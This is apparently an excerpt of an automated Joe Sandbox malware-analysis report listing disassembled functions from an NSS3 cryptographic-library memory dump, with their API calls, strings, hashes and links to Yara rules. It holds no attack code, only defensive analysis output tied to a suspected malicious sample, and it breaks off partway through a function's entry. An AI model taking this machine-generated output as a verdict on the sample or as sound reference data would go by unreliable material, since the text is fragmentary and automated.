Part of subcall function 6C6B0BE0: TlsGetValue.KERNEL32(6C6A8D2D,?,00000000,?), ref: 6C6B0C15

memcpy.VCRUNTIME140(00000000,?,4C8B1474), ref: 6C650FDB
PR_CallOnce.NSS3(6C7B2AA4,6C6B12D0), ref: 6C650FEF
PL_FreeArenaPool.NSS3(?), ref: 6C651001
PL_FinishArenaPool.NSS3(?), ref: 6C651009

Strings

security, xrefs: 6C650F5C

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: ArenaPoolUtil$DecodeItem_Quick$Alloc_CallErrorFinishFreeInitOnceValuemallocmemcpy
String ID: security
API String ID: 2061345354-3315324353
Opcode ID: a433b45c742e488d2a6df581c2e326a8701be74dd1531833b9f5cb554e98013b
Instruction ID: 2f33a5cedb1597c5d48c7ea9df9e61b681385f2f1f7db252b210df549799a561
Opcode Fuzzy Hash: a433b45c742e488d2a6df581c2e326a8701be74dd1531833b9f5cb554e98013b
Instruction Fuzzy Hash: 3B21F7B1904204ABE7109F25DD40EABB7B4EF4525CF148518FC1897601F731D965CBA6

Function 6C682BF0 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 66COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_GetMechanismInfo), ref: 6C682C0C
PR_LogPrint.NSS3( slotID = 0x%x,?), ref: 6C682C27

Part of subcall function 6C7609D0: PR_Now.NSS3 ref: 6C760A22
Part of subcall function 6C7609D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6C760A35
Part of subcall function 6C7609D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6C760A66
Part of subcall function 6C7609D0: PR_GetCurrentThread.NSS3 ref: 6C760A70
Part of subcall function 6C7609D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6C760A9D
Part of subcall function 6C7609D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6C760AC8
Part of subcall function 6C7609D0: PR_vsmprintf.NSS3(?,?), ref: 6C760AE8
Part of subcall function 6C7609D0: EnterCriticalSection.KERNEL32(?), ref: 6C760B19
Part of subcall function 6C7609D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C760B48
Part of subcall function 6C7609D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C760C76
Part of subcall function 6C7609D0: PR_LogFlush.NSS3 ref: 6C760C7E

PR_LogPrint.NSS3( type = 0x%x,?), ref: 6C682C40

Part of subcall function 6C7609D0: OutputDebugStringA.KERNEL32(?), ref: 6C760B88
Part of subcall function 6C7609D0: memcpy.VCRUNTIME140(?,?,00000000), ref: 6C760C5D
Part of subcall function 6C7609D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 6C760C8D
Part of subcall function 6C7609D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C760C9C
Part of subcall function 6C7609D0: OutputDebugStringA.KERNEL32(?), ref: 6C760CD1
Part of subcall function 6C7609D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6C760CEC
Part of subcall function 6C7609D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C760CFB
Part of subcall function 6C7609D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C760D16
Part of subcall function 6C7609D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,?), ref: 6C760D26
Part of subcall function 6C7609D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C760D35
Part of subcall function 6C7609D0: OutputDebugStringA.KERNEL32(0000000A), ref: 6C760D65
Part of subcall function 6C7609D0: fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,?), ref: 6C760D70
Part of subcall function 6C7609D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C760D90
Part of subcall function 6C7609D0: free.MOZGLUE(00000000), ref: 6C760D99

PR_LogPrint.NSS3( pInfo = 0x%p,?), ref: 6C682C59

Part of subcall function 6C7609D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6C760BAB
Part of subcall function 6C7609D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C760BBA
Part of subcall function 6C7609D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C760D7E

Strings

pInfo = 0x%p, xrefs: 6C682C54
C_GetMechanismInfo, xrefs: 6C682C07
slotID = 0x%x, xrefs: 6C682C22
nvl, xrefs: 6C682C73, 6C682C9E
type = 0x%x, xrefs: 6C682C3B

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: DebugOutputStringfflush$Printfwrite$R_snprintf$CriticalCurrentEnterExplodeFlushR_vsmprintfR_vsnprintfSectionThreadTimefputcfreememcpy
String ID: pInfo = 0x%p$ slotID = 0x%x$ type = 0x%x$C_GetMechanismInfo$nvl
API String ID: 2688868551-3092944589
Opcode ID: f44481445dd51a51d751614c79d6b8b0fbdbf9b7f84e5db14e64015740bea26d
Instruction ID: dd1988198c6f8e0e73e7861042c453d843b9615f13e6c88138af4db33ed5b33e
Opcode Fuzzy Hash: f44481445dd51a51d751614c79d6b8b0fbdbf9b7f84e5db14e64015740bea26d
Instruction Fuzzy Hash: 0F21A275202144AFDB409F54DE8CE653BB5EB8335DF048035E908E7B11DB309948CBAE

Function 6C762AD0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 46stringCOMMON

Download Yara Rule

APIs

PR_EnterMonitor.NSS3 ref: 6C762AE8
strdup.MOZGLUE(00000000), ref: 6C762AFA
PR_ExitMonitor.NSS3 ref: 6C762B0B
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(LD_LIBRARY_PATH), ref: 6C762B1E
strdup.MOZGLUE(.;\lib), ref: 6C762B32
PR_ExitMonitor.NSS3 ref: 6C762B4A
PR_SetError.NSS3(FFFFE890,00000000), ref: 6C762B59

Strings

LD_LIBRARY_PATH, xrefs: 6C762B19
.;\lib, xrefs: 6C762B29, 6C762B31

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: Monitor$Exitstrdup$EnterErrorgetenv
String ID: .;\lib$LD_LIBRARY_PATH
API String ID: 2438426442-3838498337
Opcode ID: 4a41172d6603345a728bd9c2b65e501b5810a38646bb81eebc546f7f8ab81830
Instruction ID: e14cef35638f0f7e0fe25cf8c99215dcb396f2d13582b495def34df9212ae904
Opcode Fuzzy Hash: 4a41172d6603345a728bd9c2b65e501b5810a38646bb81eebc546f7f8ab81830
Instruction Fuzzy Hash: 2101A7B5F0411267DB106FB6AE0EF5636B8AB1234DF084030EC09D2E11FB22D828C79B

Function 6C6EAB00 Relevance: 15.3, APIs: 10, Instructions: 293memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 6C6EA6D0: PORT_ZAlloc_Util.NSS3(00000A38,00000000,?,6C6E80C1), ref: 6C6EA6F9
Part of subcall function 6C6EA6D0: memcpy.VCRUNTIME140(00000210,6C7B0BEC,0000011C), ref: 6C6EA869

SECITEM_CopyItem_Util.NSS3(00000000,00000008,?,?,6C6E80AD), ref: 6C6EAB48

Part of subcall function 6C6AFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C6A8D2D,?,00000000,?), ref: 6C6AFB85
Part of subcall function 6C6AFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C6AFBB1

PORT_Strdup_Util.NSS3(?,?,?,?,?,6C6E80AD), ref: 6C6EAB8E
PORT_Strdup_Util.NSS3(?,?,?,?,?,6C6E80AD), ref: 6C6EABA7
memcpy.VCRUNTIME140(?,00000210,0000011C,?,?,?,?,6C6E80AD), ref: 6C6EABFE
memcpy.VCRUNTIME140(?,000006AA,?,?,?,?,?,?,?,?,6C6E80AD), ref: 6C6EAC1C
memcpy.VCRUNTIME140(?,000006C0,?,?,?,?,?,?,?,?,?,?,?,6C6E80AD), ref: 6C6EAC48

Part of subcall function 6C6E5BC0: PR_EnterMonitor.NSS3(8B105D8B,?,?,6C6E80E3,00000000), ref: 6C6E5BD6
Part of subcall function 6C6E5BC0: PR_EnterMonitor.NSS3(840FC085,?,?,6C6E80E3,00000000), ref: 6C6E5BED
Part of subcall function 6C6E5BC0: PR_EnterMonitor.NSS3(07890478,?,?,6C6E80E3,00000000), ref: 6C6E5C04
Part of subcall function 6C6E5BC0: PR_EnterMonitor.NSS3(000000F4,?,?,6C6E80E3,00000000), ref: 6C6E5C1B
Part of subcall function 6C6E5BC0: PR_Unlock.NSS3(0140BCE8,?,?,6C6E80E3,00000000), ref: 6C6E5C4C
Part of subcall function 6C6E5BC0: PR_Unlock.NSS3(08C48300,?,?,6C6E80E3,00000000), ref: 6C6E5C5F
Part of subcall function 6C6E5BC0: PR_ExitMonitor.NSS3(8B105D8B,?,?,6C6E80E3,00000000), ref: 6C6E5C76
Part of subcall function 6C6E5BC0: PR_ExitMonitor.NSS3(840FC085,?,?,6C6E80E3,00000000), ref: 6C6E5C8D
Part of subcall function 6C6E5BC0: PR_ExitMonitor.NSS3(07890478,?,?,6C6E80E3,00000000), ref: 6C6E5CA4
Part of subcall function 6C6E5BC0: PR_ExitMonitor.NSS3(000000F4,?,?,6C6E80E3,00000000), ref: 6C6E5CBB

PORT_ZAlloc_Util.NSS3(00000010,?,?,?,?,?,?,?,?,?,?,?,?,?,6C6E80AD), ref: 6C6EACED

Part of subcall function 6C6B0D30: calloc.MOZGLUE ref: 6C6B0D50
Part of subcall function 6C6B0D30: TlsGetValue.KERNEL32 ref: 6C6B0D6D

PORT_ZAlloc_Util.NSS3(0000001C,?,?,?,?,?,?,?,?,?,?,?,?,?,6C6E80AD), ref: 6C6EAD52
SECKEY_CopyPrivateKey.NSS3(?), ref: 6C6EAEE5
SECKEY_CopyPublicKey.NSS3(?), ref: 6C6EAEFC

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: Monitor$Util$memcpy$Alloc_EnterExit$Copy$Strdup_Unlock$ArenaItem_PrivatePublicValuecalloc
String ID:
API String ID: 3422837898-0
Opcode ID: 85cc5416a763968eb51b84c2a7253d6907210f3b63f398a93b591fc88fe9c75d
Instruction ID: 8ff75b4b60d7729e6cf4c1fc39cb59726c43701811dfd1b1371a9922902df846
Opcode Fuzzy Hash: 85cc5416a763968eb51b84c2a7253d6907210f3b63f398a93b591fc88fe9c75d
Instruction Fuzzy Hash: B0D1D6B4A052068FDB44CF28C580BE5B7E5BB49314F1882BADC1DDF746E730A994CBA5

Function 6C656DB0 Relevance: 15.2, APIs: 10, Instructions: 200memoryCOMMON

Download Yara Rule

APIs

SECITEM_ArenaDupItem_Util.NSS3(?,6C657D8F,6C657D8F,?,?), ref: 6C656DC8

Part of subcall function 6C6AFDF0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,00000000,?,?), ref: 6C6AFE08
Part of subcall function 6C6AFDF0: PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?), ref: 6C6AFE1D
Part of subcall function 6C6AFDF0: memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?), ref: 6C6AFE62

PORT_ArenaAlloc_Util.NSS3(?,00000010,?,?,6C657D8F,?,?), ref: 6C656DD5

Part of subcall function 6C6B10C0: TlsGetValue.KERNEL32(?,6C658802,00000000,00000008,?,6C64EF74,00000000), ref: 6C6B10F3
Part of subcall function 6C6B10C0: EnterCriticalSection.KERNEL32(?,?,6C658802,00000000,00000008,?,6C64EF74,00000000), ref: 6C6B110C
Part of subcall function 6C6B10C0: PL_ArenaAllocate.NSS3(?,?,?,6C658802,00000000,00000008,?,6C64EF74,00000000), ref: 6C6B1141
Part of subcall function 6C6B10C0: PR_Unlock.NSS3(?,?,?,6C658802,00000000,00000008,?,6C64EF74,00000000), ref: 6C6B1182
Part of subcall function 6C6B10C0: TlsGetValue.KERNEL32(?,6C658802,00000000,00000008,?,6C64EF74,00000000), ref: 6C6B119C

SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C778FA0,00000000,?,?,?,?,6C657D8F,?,?), ref: 6C656DF7

Part of subcall function 6C6AB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C7818D0,?), ref: 6C6AB095

SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6C656E35

Part of subcall function 6C6AFDF0: PORT_Alloc_Util.NSS3(0000000C,00000000,?,?), ref: 6C6AFE29
Part of subcall function 6C6AFDF0: PORT_Alloc_Util.NSS3(?,?,?,?), ref: 6C6AFE3D
Part of subcall function 6C6AFDF0: free.MOZGLUE(00000000,?,?,?,?), ref: 6C6AFE6F

PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6C656E4C

Part of subcall function 6C6B10C0: PL_ArenaAllocate.NSS3(?,6C658802,00000000,00000008,?,6C64EF74,00000000), ref: 6C6B116E

SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C778FE0,00000000), ref: 6C656E82

Part of subcall function 6C656AF0: SECITEM_ArenaDupItem_Util.NSS3(00000000,6C65B21D,00000000,00000000,6C65B219,?,6C656BFB,00000000,?,00000000,00000000,?,?,?,6C65B21D), ref: 6C656B01
Part of subcall function 6C656AF0: SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,00000000), ref: 6C656B8A

SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6C656F1E
PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6C656F35
SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C778FE0,00000000), ref: 6C656F6B
PR_SetError.NSS3(FFFFE005,00000000,6C657D8F,?,?), ref: 6C656FE1

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: Util$Arena$Item_$Alloc_$DecodeQuick$AllocateErrorValue$CriticalEnterSectionUnlockfreememcpy
String ID:
API String ID: 587344769-0
Opcode ID: 559510ebaea87afb963f465e8f7bc70f1fd3d7dcc70dc9d207186dbce87f4748
Instruction ID: 954080093538478ea8aa8c816fb3a002fcd3cdbe785f486965df41281d5e056a
Opcode Fuzzy Hash: 559510ebaea87afb963f465e8f7bc70f1fd3d7dcc70dc9d207186dbce87f4748
Instruction Fuzzy Hash: D971C471E102469FEB00CF55CD40BAABBA5FF95308F654229E808D7B11F731EAA5CB94

Function 6C690FE0 Relevance: 15.2, APIs: 10, Instructions: 192memorystringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C691057
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C691085
PK11_GetAllTokens.NSS3 ref: 6C6910B1
free.MOZGLUE(?), ref: 6C691107
PR_SetError.NSS3(00000000,00000000), ref: 6C691172
free.MOZGLUE(?), ref: 6C691182
free.MOZGLUE(?), ref: 6C6911A6
SECITEM_ItemsAreEqual_Util.NSS3(?,?), ref: 6C6911C5

Part of subcall function 6C6952C0: TlsGetValue.KERNEL32(?,00000001,00000002,?,?,?,?,?,?,?,?,?,?,6C66EAC5,00000001), ref: 6C6952DF
Part of subcall function 6C6952C0: EnterCriticalSection.KERNEL32(?), ref: 6C6952F3
Part of subcall function 6C6952C0: PR_Unlock.NSS3(?), ref: 6C695358

PORT_ZAlloc_Util.NSS3(0000000C), ref: 6C6911D3
PORT_ZAlloc_Util.NSS3(0000000C), ref: 6C6911F3

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: Utilfree$Alloc_Error$CriticalEnterEqual_ItemsK11_SectionTokensUnlockValuestrlen
String ID:
API String ID: 1549229083-0
Opcode ID: 1bc08763ea044f039ee64c84b7db9da5741b7d54031a55be5b23d1de1edf8f9c
Instruction ID: d3ab3c2114e30ecdde700b60d2a5752555544179803c2334b1a50a5d0e0518d9
Opcode Fuzzy Hash: 1bc08763ea044f039ee64c84b7db9da5741b7d54031a55be5b23d1de1edf8f9c
Instruction Fuzzy Hash: D061B8B0E043469BEB00DFA4DC45BAEB7B9BF05348F244168EC19AB741EB31D944CB59

Function 6C694A20 Relevance: 15.2, APIs: 10, Instructions: 182COMMON

Download Yara Rule

APIs

PK11_DoesMechanism.NSS3(?,?), ref: 6C694A4B
PK11_GetInternalSlot.NSS3 ref: 6C694A59
SECKEY_DestroyPrivateKey.NSS3(?), ref: 6C694AC6
TlsGetValue.KERNEL32 ref: 6C694B17
EnterCriticalSection.KERNEL32(?), ref: 6C694B2B
PR_Unlock.NSS3(?), ref: 6C694B77
PK11_FreeSymKey.NSS3(?), ref: 6C694B87
SECKEY_DestroyPrivateKey.NSS3(?), ref: 6C694B9A
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C694BA9
PR_SetError.NSS3(00000000,00000000), ref: 6C694BC1

Part of subcall function 6C6407A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C5D204A), ref: 6C6407AD
Part of subcall function 6C6407A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C5D204A), ref: 6C6407CD
Part of subcall function 6C6407A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C5D204A), ref: 6C6407D6
Part of subcall function 6C6407A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C5D204A), ref: 6C6407E4
Part of subcall function 6C6407A0: TlsSetValue.KERNEL32(00000000,?,6C5D204A), ref: 6C640864
Part of subcall function 6C6407A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C640880
Part of subcall function 6C6407A0: TlsSetValue.KERNEL32(00000000,?,?,6C5D204A), ref: 6C6408CB
Part of subcall function 6C6407A0: TlsGetValue.KERNEL32(?,?,6C5D204A), ref: 6C6408D7
Part of subcall function 6C6407A0: TlsGetValue.KERNEL32(?,?,6C5D204A), ref: 6C6408FB

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: Value$K11_$DestroyPrivatecalloc$CriticalDoesEnterErrorFreeInternalItem_MechanismSectionSlotUnlockUtilZfree
String ID:
API String ID: 3936029921-0
Opcode ID: 540ad9e22b3a03b835a68ea455f04c71b25fc8f41ee4ac9493024f8a1cb56d7e
Instruction ID: cb514c69d85f6cb5d4e33e89d4bf6be27c386e8d700dfcaef2aad5703bc4b1b6
Opcode Fuzzy Hash: 540ad9e22b3a03b835a68ea455f04c71b25fc8f41ee4ac9493024f8a1cb56d7e
Instruction Fuzzy Hash: DF5181B5E0020A9FDB00DF69DC44AAFB7F9EF49318F144029E819A7701E771ED158BA9

Function 6C69ADC0 Relevance: 15.1, APIs: 10, Instructions: 148COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,6C67CDBB,?,6C67D079,00000000,00000001), ref: 6C69AE10
EnterCriticalSection.KERNEL32(?,?,6C67CDBB,?,6C67D079,00000000,00000001), ref: 6C69AE24
PR_Unlock.NSS3(?,?,?,?,?,?,6C67D079,00000000,00000001), ref: 6C69AE5A
memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C67CDBB,?,6C67D079,00000000,00000001), ref: 6C69AE6F
free.MOZGLUE(85145F8B,?,?,?,?,6C67CDBB,?,6C67D079,00000000,00000001), ref: 6C69AE7F
TlsGetValue.KERNEL32(?,6C67CDBB,?,6C67D079,00000000,00000001), ref: 6C69AEB1
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C67CDBB,?,6C67D079,00000000,00000001), ref: 6C69AEC9
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6C67CDBB,?,6C67D079,00000000,00000001), ref: 6C69AEF1
free.MOZGLUE(6C67CDBB,?,?,?,?,?,?,?,?,?,?,?,?,?,6C67CDBB,?), ref: 6C69AF0B
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6C67CDBB,?,6C67D079,00000000,00000001), ref: 6C69AF30

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: Unlock$CriticalEnterSectionValuefree$memset
String ID:
API String ID: 161582014-0
Opcode ID: 7d070ac6818285caa09de712b2d8941891f45d729627f49e504059afdae77fe9
Instruction ID: fad65b32663147227c57ded8a907e7b1eb6ab56e4576f81340de2afdef39f978
Opcode Fuzzy Hash: 7d070ac6818285caa09de712b2d8941891f45d729627f49e504059afdae77fe9
Instruction Fuzzy Hash: 57517CB1E00602AFDB019F29D884B6AB7F4BF09318F144664E81997E12E731E865DBD9

Function 6C674CA0 Relevance: 15.1, APIs: 10, Instructions: 142COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,00000000,00000000,?,6C67AB7F,?,00000000,?), ref: 6C674CB4
EnterCriticalSection.KERNEL32(0000001C,?,6C67AB7F,?,00000000,?), ref: 6C674CC8
TlsGetValue.KERNEL32(?,6C67AB7F,?,00000000,?), ref: 6C674CE0
EnterCriticalSection.KERNEL32(?,?,6C67AB7F,?,00000000,?), ref: 6C674CF4
PL_HashTableLookup.NSS3(?,?,?,6C67AB7F,?,00000000,?), ref: 6C674D03
PR_Unlock.NSS3(?,00000000,?), ref: 6C674D10

Part of subcall function 6C6FDD70: TlsGetValue.KERNEL32 ref: 6C6FDD8C
Part of subcall function 6C6FDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C6FDDB4

PR_Now.NSS3(?,00000000,?), ref: 6C674D26

Part of subcall function 6C719DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C760A27), ref: 6C719DC6
Part of subcall function 6C719DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C760A27), ref: 6C719DD1
Part of subcall function 6C719DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C719DED

PR_Unlock.NSS3(?,?,00000000,?), ref: 6C674D98
PR_Unlock.NSS3(?,?,?,00000000,?), ref: 6C674DDA
PR_Unlock.NSS3(?,?,?,?,00000000,?), ref: 6C674E02

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: Unlock$CriticalSectionTimeValue$EnterSystem$FileHashLeaveLookupTableUnothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 4032354334-0
Opcode ID: 55f748033a2460254c9c3886040c91f4b96c07b6ca0c8f4cfbf9de7e7d90cbf9
Instruction ID: b98aa23e3d75ae641c1431bfecfe0f21bd859e319d41df9a30f74412226c3a0c
